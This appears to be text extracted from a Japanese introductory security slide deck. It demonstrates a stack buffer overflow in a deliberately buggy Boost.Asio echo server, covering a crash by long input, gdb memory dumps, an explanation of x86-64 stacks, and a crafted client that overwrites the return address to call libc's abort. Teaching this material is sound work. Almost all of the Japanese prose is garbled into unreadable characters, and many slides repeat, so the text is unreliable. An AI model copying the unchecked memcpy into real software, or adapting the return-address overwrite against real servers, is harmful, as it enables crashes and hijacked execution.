セキュリティ入門

ηΩϡϦςΟೖ໳ NAOMASA MATSUBAYASHI

ηΩϡϦςΟͷ໨ඪ

େࣄͳσʔλ αʔό ળྑͳϢʔβ ѱҙ͋ΔϢʔβ େࣄͳσʔλΛकΔ࠷΋؆୯Ͱ࣮֬ͳํ๏͸ Ұ੾ͷΞΫηεΛड͚෇͚ͳ͍ࣄͰ͋Δ

େࣄͳσʔλ ળྑͳϢʔβ ѱҙ͋ΔϢʔβ αʔό ͔͠͠αʔό͸αʔϏεΛఏڙ͢ΔͨΊʹ ϢʔβͷཁٻΛड͚෇͚ͳ͚Ε͹ͳΒͳ͍

େࣄͳσʔλ ળྑͳϢʔβ ѱҙ͋ΔϢʔβ αʔό ҙਤͨ͠௨Γʹ࢖͏ϢʔβΛड͚෇͚ͳ͕Β ҙਤ͠ͳ͍࢖͍ํΛ͢ΔϢʔβΛڋ൱͢Δඞཁ͕͋Δ

༏ΕͨηΩϡϦςΟͱ͸ ҙਤͨ͠࢖͍ํͱ ҙਤ͠ͳ͍࢖͍ํΛ ΑΓਖ਼֬ʹࣝผ͢Δ͜ͱ͕Ͱ͖Δࣄ

ҙਤ͠ͳ͍࢖͍ํͱ͸

#include <memory> #include <boost/asio.hpp> #include <boost/bind.hpp> namespace asio = boost::asio;
using boost::asio::ip::tcp; using sock_p = std::shared_ptr< tcp::socket >; using buf_p = std::shared_ptr< asio::streambuf >; using error_type = boost::system::error_code; struct session : public std::enable_shared_from_this< session > { session( asio::io_service &io ) : sock( io ) {} void read() { boost::asio::async_read_until( sock, buf, '\n', boost::bind( &session::check_on_read, shared_from_this(), asio::placeholders::bytes_transferred, asio::placeholders::error ) ); } void write( const char *data, size_t len ) { boost::asio::async_write( sock, boost::asio::buffer( data, len ), boost::bind( &session::check_on_write, shared_from_this(), asio::placeholders::error ) ); } tcp::socket &get_socket() { return sock; } private: void check_on_read( size_t len, const error_type& e ) { if( e && e != boost::asio::error::eof ) return; on_read( len ); } void on_read( size_t len ) { char received[ 32 ]; std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); buf.consume( len ); https://wandbox.org/permlink/eucMJp4DkeLhnGlq όάͷ͋ΔΤίʔαʔό

buf.consume( len ); received[ len ] = '\0'; write( received,
len ); } void check_on_write( const error_type& e ) { if( e && e != boost::asio::error::eof ) return; on_write(); } void on_write() { read(); } tcp::socket sock; asio::streambuf buf; }; struct server { server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); } void accept() { std::shared_ptr< session > s( new session( io ) ); acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) ); } private: void on_accept( const std::shared_ptr< session > &s, const error_type& e ) { if( !e ) s->read(); accept(); } asio::io_service &io; boost::asio::ip::tcp::acceptor acc; }; int main() { asio::io_service io; server s( io ); io.run(); } https://wandbox.org/permlink/eucMJp4DkeLhnGlq όάͷ͋ΔΤίʔαʔό

} void on_read( size_t len ) { char received[ 32
]; std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); buf.consume( len ); received[ len ] = '\0'; write( received, len ); } void check_on_write( const error_type& e ) { if( e && e != boost::asio::error::eof ) return; on_write(); } void on_write() { read(); } tcp::socket sock; asio::streambuf buf; }; struct server { server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); } void accept() { std::shared_ptr< session > s( new session( io ) ); acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) ); } private: void on_accept( const std::shared_ptr< session > &s, const error_type& e ) { if( !e ) s->read(); accept(); } asio::io_service &io; boost::asio::ip::tcp::acceptor acc; }; int main() { asio::io_service io; https://wandbox.org/permlink/eucMJp4DkeLhnGlq ݻఆ௕ ௨৴Ͱड͚औͬͨσʔλ͕ ݻఆ௕ͷ഑ྻʹऩ·ΔαΠζͱ͸ݶΒͳ͍ ϦϞʔτ͔ΒόοϑΝΦʔόʔϥϯΛىͤ͜Δ όάͷ͋ΔΤίʔαʔό void on_read( size_t len ) { char received[ 32 ]; std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); buf.consume( len ); received[ len ] = '\0'; write( received, len ); }

$ ./tiny_server $ telnet localhost 20000 Trying ::1... Trying 127.0.0.1...
Connected to localhost. Escape character is '^]'. Hello, World! Hello, World! ૹ৴ͨ͠σʔλ όΠτ ΫϥΠΞϯτ αʔό ड৴ͨ͠σʔλ όΠτ receivedͷαΠζʹऩ·͍ͬͯΔ৔߹ɺҙਤͨ͠ಈ͖Λ͍ͯ͠Δ

$ telnet localhost 20000 Trying ::1... Trying 127.0.0.1... Connected to
localhost. Escape character is '^]'. Hello, World! I would like to crash this server. Blah blah blah... Hello, World! I would like to crash this server. Blah blah blah... Connection closed by foreign host. ΫϥΠΞϯτ αʔό $ ./tiny_server Segmentation fault αʔό͕ࢮΜͩ

߈ܸऀ͕αʔϏεΛར༻ෆೳʹͰ͖ΔࣄΛ Denial of Service߈ܸ ུͯ͠DoS߈ܸ͕Մೳͱݴ͏

ͱ͜ΖͰ͖ͬ͞ͷαʔό͸ ԿނࢮΜͩ

$ gdb -q tiny_server Reading symbols from tiny_server...done. (gdb) disas
session::on_read Dump of assembler code for function session::on_read(unsigned long): … 0x000000000040a6c3 <+69>: callq 0x403340 <memcpy@plt> 0x000000000040a6c8 <+74>: mov -0x38(%rbp),%rax … (gdb) b *0x40a6c3 Breakpoint 1 at 0x40a6c3: file tiny_server.cpp, line 38. (gdb) b *0x40a6c8 Breakpoint 2 at 0x40a6c8: file tiny_server.cpp, line 39. (gdb) run Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/libthread_db.so.1". Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:38 38 std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); (gdb) p &received $1 = (char (*)[32]) 0x7fffffffd2c0 (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000 0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000 σόοΨͰαʔό͕ࢮΜͩॠؒΛݟͯΈΑ͏ Ͳ͜ʹ໰୊͕͋Δ͔͸طʹΘ͔͍ͬͯΔͷͰ όοϑΝΦʔόʔϥϯΛҾ͖ى͜͢memcpyͷલޙͰ ϒϨʔΫϙΠϯτΛு͓ͬͯ͘

Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled] Using host
libthread_db library "/lib64/libthread_db.so.1". Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:38 38 std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); (gdb) p &received $1 = (char (*)[32]) 0x7fffffffd2c0 (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000 0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000 0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000 0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000 0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ receivedʹॻ͖ࠐΉ௚લͷ received͔Β256όΠτͷϝϞϦͷঢ়ଶ receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c 0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 42 } ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ receivedʹॻ͖ࠐΜͩ௚ޙͷ received͔Β256όΠτͷϝϞϦͷঢ়ଶ receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c 0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 42 } ͜ͷҐஔʹվߦจࣈ͕ݟ͑ΔͨΊ ഑ྻͷऴ୺Λ௒͑ͯ ͜͜·Ͱॻ͖ࠐΈ͕ߦΘΕͨ͜ͱ͕Θ͔Δ receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

(gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0
0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 42 } (gdb) backtrace #0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 #1 0x2e68616c62206861 in ?? () #2 0x000000000a0d2e2e in ?? () #3 0x00007fffffffd5d0 in ?? () #4 0x0000000000000044 in ?? () #5 0x0000000000632ef0 in ?? () #6 0x00007fffffffd340 in ?? () #7 0x0000000000412898 in boost::get_pointer<session> ( p=<error reading variable: Cannot access memory at address 0x6c622068616c4218>) at /usr/include/boost/get_pointer.hpp:69 Backtrace stopped: Cannot access memory at address 0x6c622068616c4228 (gdb) disas … => 0x000000000040a706 <+136>: retq End of assembler dump. (gdb) Կॲ ࣮ߦΛଓ͚Δͱon_read͔Βreturnͨ͠ॴͰࢮ͵ όοΫτϨʔεΛݟΔͱon_read͕ฦΖ͏ͱͨ͠ ݺͼग़͠ݩͷؔ਺ͷΞυϨε͕͓͔͍͠

0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2,
session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c 0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 42 } (gdb) backtrace #0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 #1 0x2e68616c62206861 in ?? () #2 0x000000000a0d2e2e in ?? () ͜ͷΞυϨε͸ ͖ͬ͞ॻ͖ࠐΜͩϝοηʔδͷҰ෦ͩ

$16ͷߏ଄ CPU rax rbx rcx rdx rsi rdi rbp rsp
r8 r9 r10 r11 r12 r13 r14 r15 ࠓ೔ͷIntelϓϩηοαʹ͸ ܭࢉʹ࢖͏஋ΛೖΕ͓ͯ͘ശ(Ϩδελ)͕ 16ݸඋΘ͍ͬͯΔ 16ݸͰ͸଍Γͳ͘ͳͬͨΒ ࠓ͙͍͢Βͳ͍஋ΛϝϞϦʹҠͯ͠ϨδελΛۭ͚Δ

ελοΫ CPU rax rbx rcx rdx rsi rdi rbp rsp
r8 r9 r10 r11 r12 r13 r14 r15 Ϩδελ͔Βୀආͨ͠஋͕ੵ·Ε͍ͯ͘ ୀආͨ͠஋͕࠶ͼඞཁʹͳͬͨΒ ্͔ΒऔΓग़͍ͯ͘͠ rdi͔ΒҠͨ͠஋ rax͔ΒҠͨ͠஋ rbp͔ΒҠͨ͠஋ rdi͔ΒҠͨ͠஋ ͜ͷΑ͏ʹ࢖ΘΕΔϝϞϦྖҬΛ ελοΫͱݺͿ

ελοΫ int f( int x, int y ) { int
i; i = x * y; return i; } ͜ͷiͷΑ͏ͳϩʔΧϧม਺͸ ελοΫͷதʹஔ͔Ε͍ͯΔ ଞͷม਺౳ ଞͷม਺౳ ଞͷม਺౳ i ϩʔΧϧม਺͕࡞ΒΕΔͱελοΫʹ஋͕ੵ·Ε είʔϓΛൈ͚ΔͱελοΫͷ஋͕ഁغ͞ΕΔ

int f( int i, int j ) { return i
+ j; } int g() { return f( 2, 3 ); } ؔ਺ݺͼग़͠Λߦ͏ͱcallq໋ྩ͕ੜ੒͞ΕΔ return͢Δͱretq໋ྩ͕ੜ੒͞ΕΔ 00000000004004b6 <f>: 4004b6: 55 push %rbp 4004b7: 48 89 e5 mov %rsp,%rbp 4004ba: 89 7d fc mov %edi,-0x4(%rbp) 4004bd: 89 75 f8 mov %esi,-0x8(%rbp) 4004c0: 8b 55 fc mov -0x4(%rbp),%edx 4004c3: 8b 45 f8 mov -0x8(%rbp),%eax 4004c6: 01 d0 add %edx,%eax 4004c8: 5d pop %rbp 4004c9: c3 retq 00000000004004ca <g>: 4004ca: 55 push %rbp 4004cb: 48 89 e5 mov %rsp,%rbp 4004ce: be 03 00 00 00 mov $0x3,%esi 4004d3: bf 02 00 00 00 mov $0x2,%edi 4004d8: e8 d9 ff ff ff callq 4004b6 <f> 4004dd: 5d pop %rbp 4004de: c3 retq callq͸ελοΫʹ callqͷ࣍ͷΞυϨεΛੵΜͰ Ҿ਺Ͱࢦఆ͞ΕͨΞυϨεʹඈͿ retq͸ελοΫͷઌ಄ʹੵ·Εͨ ΞυϨεʹඈΜͰ ελοΫͷઌ಄ͷ஋ΛࣺͯΔ ͜ͷ૊Έ߹ΘͤͰ ؔ਺Λൈ͚ͨΒݩͷ৔ॴʹ໭Δ ͕࣮ݱ͞Ε͍ͯΔ

ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺gͷม਺ ؔ਺gͷม਺ ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺hͷม਺ ؔ਺hͷม਺ ؔ਺hͷม਺
ؔ਺f͕ؔ਺gΛݺΜͰ ͦͷதͰؔ਺h͕ݺ͹Ε͍ͯΔ࣌ͷελοΫ ࣮ߦதͷؔ਺ʹͱͬͯͷ ελοΫͷઌ಄ͱ຤ඌͷҐஔ͸$16ͷ %rspϨδελͱ%rbpϨδελʹ ه࿥͞Ε͍ͯΔ

ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺fͷม਺ ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺gͷม਺ ؔ਺gͷม਺ ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ ؔ਺hͷม਺ ؔ਺hͷม਺ ؔ਺hͷม਺
ؔ਺͸callq͞ΕͨΒ·ͣ ݱࡏͷ%rbpΛελοΫʹੵΜͰ %rbpΛ%rspʹ͢Δ ͭ·Γݺͼग़͠ݩͷؔ਺ͷελοΫͷઌ಄Λ ͜Ε͔Β࣮ߦ͢Δؔ਺ͷελοΫͷ຤ඌʹ͢Δ ؔ਺fͷSCQ ؔ਺gͷSCQ ؔ਺͔Βretq͢Δ௚લʹ %rbpΛελοΫͷઌ಄ͷ஋ʹͯ͠ ελοΫͷઌ಄ͷ஋Λഁغ͢Δ

00000000004004b6 <f>: 4004b6: 55 push %rbp 4004b7: 48 89 e5
mov %rsp,%rbp 4004ba: 89 7d fc mov %edi,-0x4(%rbp) 4004bd: 89 75 f8 mov %esi,-0x8(%rbp) 4004c0: 8b 55 fc mov -0x4(%rbp),%edx 4004c3: 8b 45 f8 mov -0x8(%rbp),%eax 4004c6: 01 d0 add %edx,%eax 4004c8: 5d pop %rbp 4004c9: c3 retq 00000000004004ca <g>: 4004ca: 55 push %rbp 4004cb: 48 89 e5 mov %rsp,%rbp 4004ce: be 03 00 00 00 mov $0x3,%esi 4004d3: bf 02 00 00 00 mov $0x2,%edi 4004d8: e8 d9 ff ff ff callq 4004b6 <f> 4004dd: 5d pop %rbp 4004de: c3 retq SCQΛελοΫʹੵΉ SCQΛSTQͷ஋ʹ͢Δ SCQΛελοΫͷ஋ʹ͢Δ ελοΫʹॻ͔ΕͨΞυϨεʹ໭Δ ͜ͷล͕ؔ਺ͷॲཧͷຊମ

(gdb) run Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1". Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:38 38 std::memcpy( received, asio::buffer_cast<const char*>( buf.data() ), len ); (gdb) p &received $1 = (char (*)[32]) 0x7fffffffd2c0 (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000 0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000 0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000 0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000 0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f ͔͜͜Β্͕ on_readͷελοΫ (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ %rbpͱ%rspͷ஋ on_readΛݺͼग़ͨؔ͠਺ͷ%rbp on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε όοϑΝΦʔόʔϥϯલ

0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) c Continuing. Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39 39 buf.consume( len ); (gdb) x/40wx 0x7fffffffd2c0 0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021 0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f 0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576 0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c 0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff 0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000 0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000 0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000 0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000 0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42 ͔͜͜Β্͕ on_readͷελοΫ (gdb) i r rsp rbp rsp 0x7fffffffd2b0 0x7fffffffd2b0 rbp 0x7fffffffd2f0 0x7fffffffd2f0 on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ %rbpͱ%rspͷ஋ on_readΛݺͼग़ͨؔ͠਺ͷ%rbp on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε όοϑΝΦʔόʔϥϯޙ returnΞυϨε͕ॻ͖׵Θͬͯ͠·ͬͨ

#1 0x2e68616c62206861 in ?? () #2 0x000000000a0d2e2e in ?? ()
returnΞυϨε͕ॻ͖׵Θͬͨঢ়ଶͰretqͨ݁͠Ռ ΞυϨε͕ࢦ͢ઌͷϝϞϦʹΞΫηεͰ͖ͳ͔ͬͨҝ ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠ όοϑΝΦʔόʔϥϯʹΑͬͯ ഑ྻreceivedͷઌʹஔ͍ͯ͋ͬͨ returnΞυϨε͕ॻ͖׵͑ΒΕͯ͠·ͬͨ

ॻ͖׵͑ΒΕͨΞυϨε͕ ΞΫηεՄೳͩͬͨΒ Կ͕ى͍ͬͯͨ͜

#include <iostream> #include <boost/asio.hpp> int main() { namespace asio =
boost::asio; using boost::asio::ip::tcp; asio::io_service io_service; tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0x0d, 0x0a, }; boost::system::error_code error; asio::write(socket, asio::buffer(data), error); return 0; if( !error ) { asio::streambuf receive_buffer; asio::read_until(socket, receive_buffer, '\n', error); std::cout << asio::buffer_cast<const char*>(receive_buffer.data()) << std::endl; } } ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ

boost::asio; using boost::asio::ip::tcp; asio::io_service io_service; tcp::socket socket(io_service); socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) ); std::vector< uint8_t > data { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00, 0x0d, 0x0a, }; boost::system::error_code error; asio::write(socket, asio::buffer(data), error); return 0; if( !error ) { asio::streambuf receive_buffer; asio::read_until(socket, receive_buffer, '\n', error); std::cout << asio::buffer_cast<const char*>(receive_buffer.data()) << std::endl; } } (gdb) disas abort Dump of assembler code for function abort: 0x00007ffff6f624e0 <+0>: sub $0x128,%rsp 0x00007ffff6f624e7 <+7>: mov %fs:0x10,%rdx … Cݴޠඪ४ϥΠϒϥϦͷabortؔ਺ͷΞυϨε͕ ελοΫͷreturnΞυϨεͷҐஔʹདྷΔΑ͏ʹ αʔόʹૹΔσʔλΛ࡞Δ

$ ./pktgen ΫϥΠΞϯτ αʔό $ gdb -q ./tiny_server Reading symbols
from ./tiny_server...done. (gdb) run Starting program: /home/fadis/tiny_server [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib64/ libthread_db.so.1". Program received signal SIGABRT, Aborted. 0x00007ffff6f61228 in raise () from / lib64/libc.so.6 (gdb) backtrace #0 0x00007ffff6f61228 in raise () from / lib64/libc.so.6 #1 0x00007ffff6f6264a in abort () from / lib64/libc.so.6 #2 0x0000000000000a0d in ?? () #3 0x00007fffffffd5d0 in ?? () SIGSEGVͰ͸ͳ͘SIGABRTͰαʔό͕ఀࢭͨ͠

Program received signal SIGABRT, Aborted. 0x00007ffff6f61228 in raise () from
/ lib64/libc.so.6 (gdb) backtrace #0 0x00007ffff6f61228 in raise () from / lib64/libc.so.6 #1 0x00007ffff6f6264a in abort () from / lib64/libc.so.6 #2 0x0000000000000a0d in ?? () #3 0x00007fffffffd5d0 in ?? () #4 0x0000000000000042 in ?? () #5 0x0000000000632ef0 in ?? () #6 0x00007fffffffd340 in ?? () #7 0x0000000000412898 in boost::get_pointer<session> ( p=<error reading variable: Cannot access memory at address 0xfffffffffffffff9>) at /usr/include/boost/get_pointer.hpp: 69 Backtrace stopped: previous frame inner to this frame (corrupt stack?) αʔόͷίʔυ্Ͱ͸ ݺΜͰ͍ͳ͍ abortؔ਺͕ ݺ͹Εͨ͜ͱʹͳ͍ͬͯΔ

߈ܸऀ͕ࢦఆͨؔ͠਺͕ ࣮ߦ͞Εͯ͠·ͬͨ

